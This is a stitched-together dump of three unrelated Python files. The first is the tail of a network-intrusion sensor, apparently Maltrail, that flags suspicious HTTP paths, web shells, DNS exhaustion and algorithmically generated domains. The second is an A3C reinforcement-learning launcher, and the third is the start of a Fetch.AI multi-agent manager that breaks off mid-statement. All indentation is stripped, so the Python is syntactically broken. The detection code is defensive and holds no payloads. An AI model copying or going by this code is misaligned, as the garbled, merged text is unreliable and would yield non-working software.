if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
unquoted_path = urllib.unquote(path)
unquoted_post_data = urllib.unquote(post_data or "")
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_path)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_path] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_post_data)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_post_data] = found or ""
if found:
trail = "%s(%s \(%s %s\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = urlparse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset])
if not length:
query = query[:-1]
break
query += dns_data[offset + 1:offset + length + 1] + '.'
offset += length + 1
query = query.lower()
if not query or '.' not in query or not all(_ in VALID_DNS_CHARS for _ in query) or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2]) & 0xfe == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if "%s:%s" % (dst_ip, dst_port) in trails:
trail = "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2]) & 0x80: # standard response
if ord(dns_data[3]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails:
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec / 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec / 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:]), "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) > 2:
part = parts[0] if parts[0] != "www" else parts[1]
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
else:
part = query
trail = query
if part and '-' not in part:
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
_regex += "|(?P<g%s>%s)" % (_regex.count("(?P<g"), trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.func_name = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if subprocess.mswindows or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and interface not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not subprocess.mswindows and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = "\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER / MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in ("\x00\x21", "\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == "\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in ("\x08\x00", "\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
sec, usec = header.getts()
if _multiprocessing:
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, struct.pack("=III", sec, usec, ip_offset) + packet)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, "", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
def main():
print("%s (sensor) #v%s\n" % (NAME, VERSION))
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (too)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (basestring, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(getattr(ex, "message"), basestring):
print(ex)
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--tt', type=float, default=10,
help='thread update freq (default: 10)')
parser.add_argument('--tg', type=float, default=10,
help='global update freq (default: 10)')
parser.add_argument('--epsilon', type=float, default=0.01,
help='epsilon action selection (default: 0.01)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='value loss coefficient (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=4000,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
# p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
# p.start()
# processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
manager.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import json
import os
import threading
from asyncio.tasks import FIRST_COMPLETED
from collections import defaultdict
from shutil import rmtree
from threading import Thread
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.constants import AEA_MANAGER_DATA_DIRNAME, DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PublicId
from aea.crypto.plugin import load_all_plugins
from aea.helpers.io import open_file
from aea.manager.project import AgentAlias, Project
class ProjectNotFoundError(ValueError):
"""Project not found exception."""
class ProjectCheckError(ValueError):
"""Project check error exception."""
def __init__(self, msg: str, source_exception: Exception):
"""Init exception."""
super().__init__(msg)
self.source_exception = source_exception
class AgentRunAsyncTask:
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
self.agent = agent
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self.task = self.run_loop.create_task(self._run_wrapper())
self._done_future = asyncio.Future(loop=self.caller_loop)
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
def stop(self,) -> None:
"""Stop the task."""
super().stop()
if self._thread is not None:
self._thread.join()
class MultiAgentManager:
"""Multi agents manager."""
MODES = ["async", "threaded"]
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
auto_add_remove_project: bool = False,
password: Optional[str] = None,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
:param mode: str. async or threaded
:param registry_path: str. path to the local packages registry
:param auto_add_remove_project: bool. add/remove project on the first agent add/last agent remove
:param password: the password to encrypt/decrypt the private key.
:return: None
"""
self.working_dir = working_dir
self._auto_add_remove_project = auto_add_remove_project
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._data_dir = os.path.abspath(
os.path.join(self.working_dir, AEA_MANAGER_DATA_DIRNAME)
)
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, AgentRunAsyncTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = []
self._last_start_status: Optional[
Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]
] = None
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
self._password = password
@property
def data_dir(self) -> str:
"""Get the certs directory."""
return self._data_dir
def get_data_dir_of_agent(self, agent_name: str) -> str:
"""Get the data directory of a specific agent."""
return os.path.join(self.data_dir, agent_name)
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
@property
def projects(self) -> Dict[PublicId, Project]:
"""Get all projects."""
return self._projects
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._event = asyncio.Event(loop=self._loop)
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
if not self._event: # pragma: nocover
raise ValueError("Do not use this method directly, use start_manager.")
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
